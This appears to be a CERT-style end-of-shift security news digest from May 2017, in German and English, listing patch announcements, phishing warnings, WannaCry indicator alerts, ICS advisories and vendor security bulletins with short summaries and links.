End-of-Shift report
Timeframe: Dienstag 16-05-2017 18:00 − Mittwoch 17-05-2017 18:00
Handler: Stephan Richter
Co-Handler: n/a
Jetzt patchen: Gerfährliche Sicherheitslücke in Joomla
Das Joomla-Team schließt mit Version 3.7.1 eine SQL-Injection-Lücke, die fatale Folgen haben kann. Joomla-Admins sollten zügig reagieren.
https://heise.de/-3716175
WordPress-Update 4.7.5 schließt sechs Sicherheitslücken
Zwar werden keine der Lücken als kritisch eingestuft, Admins sollten sich aber trotzdem um die XSS- und CSRF-Lücken kümmern.
https://heise.de/-3716055
Extending Microsoft Edge Bounty Program
Over the past 10 months, we've paid out more than $200,000 USD in bounties to researchers reporting vulnerabilities through the Microsoft Edge Bounty Program. Partnering with the research community has helped improve Microsoft Edge security, and to continue this collaboration, today we're extending the end date of the Edge on Windows Insider Preview (WIP) bounty...
https://blogs.technet.microsoft.com/msrc/2017/05/16/extending-microsoft-edge-bounty-program/
BSI veröffentlicht Mindeststandard für Mobile Device Management
Der Mindeststandard definiert in 40 technischen und organisatorischen Regeln die Anforderungen an MDM-Systeme des Bundes sowie deren Betrieb. Er definiert, welche Richtlinien ein System umsetzen können muss, lässt aber Spielraum bei deren Ausgestaltung.
https://heise.de/-3715500
Basic Best Practices for Securing LDAP and Active Directory with Red Hat
In the enterprise, its very popular to manage Windows client PCs through Red Hat servers. This sort of configuration is especially common in healthcare and the financial services industries. Red Hat Enterprise Linux (RHEL) has good software for working with Windows Active Directory. Red Hat Enterprise Linux can also manage clients with multiple platforms, such as Windows, OS X, Android, and other Linux distributions with OpenLDAP, an opensource implementation of the Lightweight Directory Access [...]
https://www.alienvault.com/blogs/security-essentials/basic-best-practices-for-securing-ldap-and-active-directory-with-red-hat
Gefälschtes easybank-Schreiben: Konto gesperrt
Kriminelle versenden eine gefälschte easybank-Nachricht. Darin heißt es, dass Unbekannte auf das Konto zugegriffen haben. Deshalb sollen Kund/innen eine Website aufrufen, persönliche Bankdaten bekannt geben und ihr Konto bestätigen. Wer die verlangten Informationen Preis gibt, übermittelt sie an Verbrecher/innen.
https://www.watchlist-internet.at/phishing/gefaelschtes-easybank-schreiben-konto-gesperrt/
Why Phishing Attacks Succeed
The first time I received a "secure" email message from my bank, I was a bit suspicious of what I was actually seeing. It looked too much like a phishing attempt for my comfort. The message in my inbox was from my banker's email address, not from Chase 1 directly. It also included an attached HTML page and instructions to "open the attached page in an browser for instructions on how to proceed."
https://ttmm.io/tech/why-phishing-attacks-succeed/
How Big Fuzzing helps find holes in open source projects
Googles beta project, OSS-Fuzz, has found 264 vulnerabilities in 47 open-source projects - so is it an idea whose time has come?
https://nakedsecurity.sophos.com/2017/05/17/how-big-fuzzing-helps-find-holes-in-open-source-projects/
Security Advisory - DoS Vulnerability in Some Huawei Products
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170517-01-ac-en
SSB-412479 (Last Update 2017-05-16): Customer Information on WannaCry Malware for Siemens Healthineers Imaging and Diagnostics Products
https://www.siemens.com/cert/pool/cert/siemens_security_bulletin_ssb-421479.pdf
Indicators Associated With WannaCry Ransomware (Update A)
This updated alert is a follow-up to the original alert titled ICS-ALERT-17-135-01 Indicators Associated With WannaCry Ransomware that was published May 15, 2017, on the NCCIC/ICS-CERT web site.
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-135-01A
FortiOS stored XSS vulnerability in the policy global-label parameter
FortiOS is subject to a Cross-Site Scripting vulnerability, due to an improperly sanitized parameter in a hidden CLI configuration setting named global-label . This can however only be exploited by an administrator with write privileges.
http://fortiguard.com/psirt/FG-IR-17-057
NTP vulnerability CVE-2017-6463
NTP vulnerability CVE-2017-6463. Security Advisory. Security Advisory Description. NTP before 4.2.8p10 and 4.3.x before ...
https://support.f5.com/csp/article/K02951273
Linux kernel vulnerability CVE-2017-8106
Linux kernel vulnerability CVE-2017-8106. Security Advisory. Security Advisory Description. The handle_invept function ...
https://support.f5.com/csp/article/K34886212
Schneider Electric VAMPSET
This advisory contains mitigation details for a memory corruption vulnerability in Schneider Electric's VAMPSET.
https://ics-cert.us-cert.gov/advisories/ICSA-17-136-04
Detcon SiteWatch Gateway
This advisory contains mitigation details for authentication bypass and plaintext storage of a password vulnerabilities in Detcon's SiteWatch Gateway.
https://ics-cert.us-cert.gov/advisories/ICSA-17-136-01
Hanwha Techwin SRN-4000
This advisory contains mitigation details for an unauthenticated access vulnerability in Hanwha Techwin's SRN-4000.
https://ics-cert.us-cert.gov/advisories/ICSA-17-136-03
Schneider Electric SoMachine HVAC
This advisory contains mitigation details for buffer overflow and DLL hijack vulnerabilities in Schneider Electric's SoMachine HVAC.
https://ics-cert.us-cert.gov/advisories/ICSA-17-136-02
IBM Security Bulletins
IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security Network Protection
http://www-01.ibm.com/support/docview.wss?uid=swg21999513
IBM Security Bulletin: Vulnerabilities in IBM Java SDK affects IBM Algo One Algo Risk Application and Core (CVE-2016-5546, CVE-2016-5548, CVE-2016-5549, CVE-2016-5547, CVE-2016-2183)
http://www.ibm.com/support/docview.wss?uid=swg22000818
IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Installation Manager and IBM Packaging Utility
http://www-01.ibm.com/support/docview.wss?uid=swg22003157
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Monitoring
http://www.ibm.com/support/docview.wss?uid=swg22002865
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Integration Designer and WebSphere Integration Developer
http://www-01.ibm.com/support/docview.wss?uid=swg22002555
IBM Security Bulletin: Vulnerability in Apache Tomcat affects IBM Algo One Core (CVE-2016-8745)
http://www.ibm.com/support/docview.wss?uid=swg22001932
IBM Security Bulletin: A vulnerability in OpenSSH affects IBM Security Network Protection (CVE-2015-8325)
http://www-01.ibm.com/support/docview.wss?uid=swg21999248
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime IBM affect IBM Decision Optimization Center and IBM ILOG ODM Enterprise
http://www-01.ibm.com/support/docview.wss?uid=swg22003304
IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM ILOG CPLEX Optimization Studio
http://www-01.ibm.com/support/docview.wss?uid=swg22003305
IBM Security Bulletin: Vulnerabilities in GNU C library (glibc) affect IBM Security Network Protection
http://www-01.ibm.com/support/docview.wss?uid=swg22001907
IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Security Network Protection (CVE-2016-8610, and CVE-2017-3731)
http://www-01.ibm.com/support/docview.wss?uid=swg21999162
IBM Security Bulletin: Multiple vulnerabilities in NTP affect IBM Security Network Protection
http://www-01.ibm.com/support/docview.wss?uid=swg21999246